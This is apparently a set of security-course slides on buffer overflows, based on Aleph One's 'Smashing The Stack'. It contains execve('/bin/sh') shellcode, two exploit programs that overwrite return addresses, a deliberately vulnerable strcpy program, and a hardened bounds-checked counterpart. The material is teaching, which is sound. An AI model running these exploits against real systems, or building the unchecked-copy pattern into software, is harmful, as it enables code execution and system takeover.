Smashing The Stack For Fun And Profit Aleph
- Slides: 43
References

- "Smashing The Stack For Fun And Profit", Aleph One, Phrack 49-14, http://www.phrack.com
- "How to write Buffer Overflows", mudge, SecurityFocus
- "Advanced buffer overflow exploit", Taeho Oh, SecurityFocus
- "Buffer overflow exploit in the alpha linux", Taeho Oh, SecurityFocus, http://www.securityfocus.com
- "Writing buffer overflow exploits - a tutorial for beginners", Mixter, SecurityFocus, http://members.tripod.com/mixtersecurity/papers.html
- "buffer overwrites", http://www.rootshell.com/documentation.html
- "w00 on Heap Overflows", http://www.tlsecurity.net/Textware/BoF_DoS_+/heap-overflows.txt
- "StackGuard Compiler", http://www.cse.ogi.edu/DISC/projects/immunix/StackGuard/

http://www.kisec.com
1. Buffer Overflow

What is a buffer overflow?
- A condition that arises because C/C++ compilers perform no array boundary check, so data larger than the declared size of a buffer can be written into it.
- A condition that arises because the operating system allows arbitrary data to be written to, and executed from, the stack or heap area.

[Figure: execution stack frame (activation record), from lower to higher memory address: local variables (buffer area), stack frame pointer, return address, arguments. The overflow runs upward from the buffer toward the return address.]
1.1 Types of Buffer Overflow

Stack-based buffer overflow: data (executable code) exceeding the size of a buffer allocated in the stack area is written into it and the saved return address is altered, so that arbitrary code is executed. Reference: "Smashing The Stack For Fun And Profit", Aleph One, Phrack 49-14.

Heap-based buffer overflow: data exceeding the size of a buffer allocated in the heap area is written into it, or stored data and function addresses are altered, so that arbitrary code is executed. Reference: "w00 on Heap Overflows", w00.

[Figure: process memory layout, from lower to higher memory address: program header table, TEXT area, initialized DATA area, uninitialized DATA area, HEAP area, STACK area.]
2.1 Principles of the Buffer Overflow Attack (1)

exploit1.c

#include <string.h>

/* Aleph One's 46-byte Linux/x86 shellcode: execve("/bin/sh") */
char shellcode[] =
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/sh";

char large_string[128];

int main(void) {
    char buffer[96];
    int i;
    long *long_ptr = (long *) large_string;

    /* fill large_string with 32 copies of buffer's address (32-bit pointers) */
    for (i = 0; i < 32; i++)
        *(long_ptr + i) = (int) buffer;

    /* place the shellcode at the start of large_string */
    for (i = 0; i < strlen(shellcode); i++)
        large_string[i] = shellcode[i];

    /* 128 bytes into a 96-byte buffer: SFP and return address are overwritten */
    strcpy(buffer, large_string);
    return 0;
}
2.1 Principles of the Buffer Overflow Attack (2)

[Figure: stack layout of exploit1.c during strcpy(). The frame of main() holds buffer (96 bytes, at 0xbfffffxx), int i and long *long_ptr, then the SFP, the return address and the parameters. large_string holds the 46-byte shellcode (\xeb\x1f\x5e\x89 \x76\x08\x31\xc0 \x88\x46\x07\x89 \x46\x0c\xb0\x0b \x89\xf3\x8d\x4e \x08\x8d\x56\x0c \xcd\x80\x31\xdb ...) followed by repeated copies of the address 0xbfffffxx, so the copy overwrites the return address with the address of buffer. Size labels on the figure: 80 bytes, 32 bytes, 46 bytes, 96 bytes.]
2.2 Understanding the Buffer Overflow Attack (1)

vulpro.c

#include <stdio.h>
#include <string.h>

void function(char *str) {
    char buffer[256];
    printf("Addr of buffer: %p\n", buffer);
    strcpy(buffer, str);              /* no bounds check: str longer than 255 bytes overflows */
    printf("Hello, %s!\n", buffer);
}

int main(int argc, char *argv[]) {
    function(argv[1]);
    printf("Terminated normally.\n");
    return 0;
}

# gcc vulpro.c -o vulpro
# ./vulpro bof
Addr of buffer: 0xbfffffxx
Hello, bof!
Terminated normally.
#

[Figure: the 256-byte buffer of function() filled with the shellcode (\xeb\x1f\x5e\x89 \x76\x08\x31\xc0 \x88\x46\x07\x89 \x46\x0c\xb0\x0b \x89\xf3\x8d\x4e \x08\x8d\x56\x0c \xcd\x80\x31\xdb \x89\xd8\x40\xcd \x80\xe8\xdc\xff ... /bin/sh), followed by the SFP, the return address and the address of argv[1].]
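A hardened counterpart to function() in vulpro.c, added here as an example (not code from the original slides or from Aleph One's paper): the strcpy() pattern beside a version that measures the input within the buffer size before copying and refuses anything that does not fit. constructed_input() builds constructed test strings and overflow_bytes() reports how far a given input would run past the buffer; BUF_SIZE and the function names are assumptions.

```c
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 256   /* same size as buffer[] in vulpro.c */

/* Vulnerable pattern from vulpro.c: strcpy() copies until the NUL
 * terminator, so any str longer than BUF_SIZE - 1 bytes runs past
 * buffer[] into the saved frame pointer and return address. */
void function_vulnerable(const char *str) {
    char buffer[BUF_SIZE];
    strcpy(buffer, str);                 /* no bounds check */
    printf("Hello, %s!\n", buffer);
}

/* Hardened version: look for the terminator within the buffer size
 * first (memchr never reads beyond BUF_SIZE bytes), reject input that
 * would not fit together with its NUL, and copy only the measured length.
 * Returns 0 on success, -1 when the input was rejected. */
int function_safe(const char *str) {
    char buffer[BUF_SIZE];
    const char *nul = memchr(str, '\0', BUF_SIZE);
    if (nul == NULL) {
        fprintf(stderr, "input of %d or more bytes rejected\n", BUF_SIZE);
        return -1;
    }
    memcpy(buffer, str, (size_t)(nul - str) + 1);  /* nul - str < BUF_SIZE */
    printf("Hello, %s!\n", buffer);
    return 0;
}

/* How many bytes a len-byte string (plus its NUL) written by strcpy()
 * would land past the end of a buf_size-byte buffer; 0 when it fits. */
size_t overflow_bytes(size_t len, size_t buf_size) {
    return len + 1 > buf_size ? len + 1 - buf_size : 0;
}

/* Constructed sample input: len bytes of 'A' (capped below 1024), used
 * to exercise the check without touching the process's own stack. */
const char *constructed_input(size_t len) {
    static char sample[1024];
    if (len >= sizeof sample) len = sizeof sample - 1;
    memset(sample, 'A', len);
    sample[len] = '\0';
    return sample;
}
```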
2.2 Understanding the Buffer Overflow Attack (2)

exploit2.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define DEFAULT_OFFSET        0
#define DEFAULT_BUFFER_SIZE 512

char shellcode[] =
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0"
    "\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
    "\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/sh";

/* Current stack pointer: left in %eax, the 32-bit x86 return register */
unsigned long get_sp(void) {
    __asm__("movl %esp, %eax");
}

int main(int argc, char *argv[]) {
    char *buff, *ptr;
    long *addr_ptr, addr;
    int offset = DEFAULT_OFFSET, bsize = DEFAULT_BUFFER_SIZE;
    int i;

    if (!(buff = malloc(bsize))) {
        printf("Can't allocate memory.\n");
        exit(0);
    }

    /* guessed address of the target buffer: stack pointer minus an offset */
    addr = get_sp() - offset;
    printf("Using address: 0x%lx\n", addr);

    /* fill the whole buffer with the guessed address, 4 bytes at a time */
    ptr = buff;
    addr_ptr = (long *) ptr;
    for (i = 0; i < bsize; i += 4)
        *(addr_ptr++) = addr;

    /* then write the shellcode starting after the first 4 bytes */
    ptr += 4;
    for (i = 0; i < strlen(shellcode); i++)
        *(ptr++) = shellcode[i];

    buff[bsize - 1] = '\0';
    /* the listing on this slide ends here */
    return 0;
}